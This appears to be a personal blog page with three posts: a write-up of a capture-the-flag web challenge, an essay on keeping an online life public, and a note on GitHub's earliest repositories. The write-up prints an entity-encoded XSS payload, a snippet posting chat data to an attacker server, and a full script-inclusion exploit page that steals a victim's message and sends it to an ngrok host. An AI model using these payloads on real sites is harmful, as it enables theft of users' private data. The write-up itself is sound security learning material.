Abhay Rana aka Capt. Nemo

ECTF-14 Web400 Writeup

We recently participated in ECTF-14 and it was a great experience. Here's a writeup to the web400 challenge:

Problem Statement

The chat feature was added to Facelook website and to test it, founder of the company had sent a message in chat to the admin. Admin reads all the chat messages, but does not reply to anyone. Try to get that chat message and earn the bounty. Annoying Admin

The challenge consisted of a simple signup and a chat message sending feature, where anyone could send a chat message to anyone. However, on the loading side, the chat message was loaded using Javascript. The code for loading the messages looked like this:

function load_messages (id) {
    $.ajax({
    url: "http://212.71.235.214:4050/chat",
    data: {
        sender: id,
    },
    success: function( response ) {
        eval(response);
    }
    });
}

The url above responded as the following:

$('#chat_234').html('');$('#chat_234').append('dream<br />');

Where dream was the message I sent. My first attempt was to break out of the append function, and execute my own javascript, by trivially using a single quote. Unfortunately, the single quote was escaped and removed by the backend.

Next, I tried using &#x27; instead of a single quote, and it worked:

Message Sent: &#x27;+alert(1)+&#x27; Message received: $('#chat_234').html('');$('#chat_234').append('dream<br />');$('#chat_234').append(''+alert(1)+'<br />');

This seemed simple enough to exploit as XSS, so I quickly wrote up my exploit:

$.get('/chat?sender=2', function(data){ $.post("http://my-server.com/ectf/index.php", {content: data}); });

This utilized the fact that we knew Founder's user id to be 2. The code worked perfectly fine with my test accounts, but something weird happened when the challenge server (admin) ran it. I would get a GET request on the above mentioned url, instead of a POST. Also attempting to generate the URL using concat or + or any operator such as : "http://my-server.com/index.php?data="+document.cookie made a request to http://my-server.com/index.php?data=. Anything I appended was just ignored, plain and simple.

After attempting to get a POST request with cookie or session data for a lot of time, I realized that the problem was not XSS, but rather a CSRF attack. This was because the data was being loaded in a Javascript request, instead of JSON. Javascript request (using a script tag) can be made across domains, which meant that any website could access the data by using the proper script tag. We just had to add a script tag with its src set to http://212.71.235.214:4050/chat?sender=2. This would automatically add the chat message to a div with id chat_2.

The only issue was that Admin had to visit our site, with proper cookies, and we know already that admin has been sniffing for links and visiting them. So I wrote up my second (this time working) exploit:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8"> 
  <title>ECTF14 web400 exploit</title>
</head>
<body>
  <div id="chat_2"></div>
  <div id="chat_106"></div>
  <script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
  <script>
    $(document).ready(function(){
      $.getScript("http://212.71.235.214:4050/chat?sender=2");
      setTimeout(function(){
        var text = $('#chat_2').text();
        $.post('http://20c7d53b.ngrok.com/', {content:text});
      }, 1000);
    })
  </script>
</body>
</html>

Unfortunately, the exploit did not work on Chrome because Chrome refused to run the script as javascript, because it was being served with a mime-type of text/html. It worked in firefox, and I crossed my fingers as I sent out the link to the above page to admin in a chat message. I knew admin user was using PhantomJS to run my javascript (because of the user-agent in numerous GET requests I got earlier). So, I was hopeful that this would work.

I was listening at the url, and sure enough as soon as I sent a link out to this page, admin ran my javascript and I got the flag in a POST request.

The flag was bad_js_is_vulnerable.

Living a public life as a privacy advocate

If you've known me for a while, you might know me as a privacy conscious individual or perhaps as someone who leads a very public life. The truth is that I lead both these lives; and while that may sound oxymoronic to some, its perfectly clear to me.

I'm a huge privacy advocate. I still remember the day I woke up and read about PRISM first thing in the morning. My reaction was a mix of disbelief, anger, and frustration. In the aftermath of the PRISM reveal, I made a few choices: I would retain ownership of my data, and I'll do whatever I can to promote tools that help you do this.

I'm still working on both fronts, but the reality of the situation is that we are surrounded by walled gardens. I decided to make the best I could of these gardens. I remember reading a weird suggestion: only post public stuff on facebook; and I was somehow convinced to try it out.

But I took the experiment a step further. If the service is something I can't control myself (say self-hosted), everything I do with it should be for public-viewing. Since then, I've rarely posted anything private on facebook.

Other services where I follow the same advice include:

  • Goodreads - Whatever I read is public information, along with real-time updates of my reading habits.
  • Last.FM - All my music tastes, along with real-time upates on what I'm listening to.
  • Facebook - All of my posts on facebook are public. I do have some private messaging interactions on facebook (I never initiate them) and usually move them to email if they grow important.
  • Twitter - Tiny byte-sized thoughts and observations are again, public. My account is set to public, which doesn't mean that I trust twitter with my data. It just means that I expect my data to be public.
  • GitHub - One of the few companies I trust to keep my data safe. Barring a few exceptions, everything I do on github is public, ready for anyone to analyze and use as public data. In fact, github makes all of its timeline data available to public as a dataset on bigquery.
  • Bookmarks - Most of my bookmarks are public via xmarks. I haven't synced it in a while since XMarks and Chrome Sync don't work well together, but plan to do something about this as well.

Along with all this, most of the writing I do these days is for public consumption, either via my Blog, or some platform like Quora, StackExchange, or Medium.

Why

My reasoning behind keeping all of my online life public is twofold:

  1. This creates a public archive of my life, accessible to everyone.
  2. It doesn't give me an illusion of privacy when there is none.

In reference to (1) above, I recently setup Google Inactive Accounts, and have to commend Google on the execution of the concept. Be sure to check it out at https://www.google.com/settings/account/inactive.

Disadvantages

This lifestyle choice is not without its comebacks. Stalking me, for example, is very easy. So is probably impersonating me as well. However, these are risks I'm willing to take in order to lead a public life.

Exceptions

By now you might be thinking of me as a pro-facebook share-everything kind of guy. But that's not completely true. I do have clear limits on what counts as public and what does not. I value my privacy (and that of those close to me) very dearly.

For instance, I count my photographs as something very private. I almost never post public updates anywhere with my picture in it. Perhaps its because I never had any phone with decent camera. Whatever the reason, I try really hard to keep my pictures off the internet.

Another related issue is when the update would involve someone beside me. For example, my sister was recently engaged and I didn't go on a social update spree telling the whole world about it, because I value her privacy.

My simple rule of thumb is to ask for permission, rather than beg for forgiveness as a person's privacy is far more important.

What was the first project on GitHub?

Note: This is cross-posted from Quora where I wrote this answer initially.

The first project on GitHub was grit. How do I know this? Just some clever use of the search and API.

Here's a GitHub search to see the first 10 projects that were created on GitHub. The search uses the created keyword, and searches for projects created before 15 Jan 2008.

They are (in order of creation) (numeric id of repo in brackets):

  1. mojombo/grit (1)

    Grit gives you object oriented read/write access to Git repositories via Ruby. Deprecated in favor of libgit2/rugged

  2. wycats/merb-core (26)

    Merb Core: All you need. None you don't. Merb was an early ruby framework that was merged to Rails No longer maintained.

  3. rubinius/rubinius (27)

    Rubinius, the Ruby Environment Still under active development

  4. mojombo/god (28)

    God is an easy to configure, easy to extend monitoring framework written in Ruby. Still actively maintained, and use by GitHub internally as well, I think

  5. vanpelt/jsawesome(29)

    JSAwesome provides a powerful JSON based DSL for creating interactive forms. Its last update was in 2008

  6. wycats/jspec (31)

    A JavaScript BDD Testing Library No longer maintained

  7. defunkt/exception_logger (35)

    The Exception Logger logs your Rails exceptions in the database and provides a funky web interface to manage them. No longer maintained>

  8. defunkt/ambition (36)
  9. technoweenie/restful-authentication (42)

    Generates common user authentication code for Rails/Merb, with a full test/unit and rspec suite and optional Acts as State Machine support built-in.Maintained till Aug 2011

  10. technoweenie/attachment_fu (43)

    Treat an ActiveRecord model as a file attachment, storing its patch, size, content type, etc.

I'm sure the id from 2-25 would be taken up by many of the internal GitHub projects, such as github/github. To get the numeric id of a repo, visit https://api.github.com/repos/mojombo/grit and change the URL accordingly.